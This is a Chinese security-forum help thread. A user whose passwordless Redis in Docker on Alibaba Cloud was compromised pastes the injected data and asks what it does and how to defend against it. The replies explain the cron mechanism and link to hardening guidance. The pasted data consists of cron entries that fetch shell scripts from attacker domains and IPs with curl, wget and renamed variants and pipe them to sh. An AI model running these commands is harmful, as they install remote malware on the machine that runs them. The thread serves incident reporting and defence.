吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3633|回复: 4
收起左侧

[已解决] 求助,Docker上的Redis被攻击,怎么办?

[复制链接]
ruozhuliufeng 发表于 2021-11-4 09:34
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 ruozhuliufeng 于 2021-11-4 18:00 编辑

求助!在阿里云服务器上用Docker部署了Redis,开放6379端口,为了开放方便,没有添加密码。昨天使用完后,我清空了数据库,今早起来看到里面自动添加了这五条数据,打开网址360提示会传播木马病毒,求助各位大神,这语句是什么意思?如果是下载文件,这个文件是下载到哪里的?我的redis部署在docker中,这个文件对Linux系统有影响吗?如何防范这种攻击?刚刚已经更改了Redis的端口了。


*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh

*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh

*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh

*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh

*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh

*/2 * * * * cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh

*/3 * * * * wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh

*/4 * * * * curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh

*/5 * * * * wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh```


阿里云服务加固
https://help.aliyun.com/knowledge_detail/37447.html#title-vka-frx-5u0

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| ruozhuliufeng 发表于 2021-11-4 18:01
已完成,请求删帖
cutthesoul 发表于 2021-11-6 14:48
docker里的主机中了病毒不会影响到主机,应该是定时任务执行链接里的脚本
coder1307 发表于 2022-8-12 10:28
楼主怎么解决的,我的redis也是一样,值变成backup了
 楼主| ruozhuliufeng 发表于 2022-9-7 21:47
阿里云服务加固
https://help.aliyun.com/knowledge_detail/37447.html#title-vka-frx-5u0
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 18:19

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表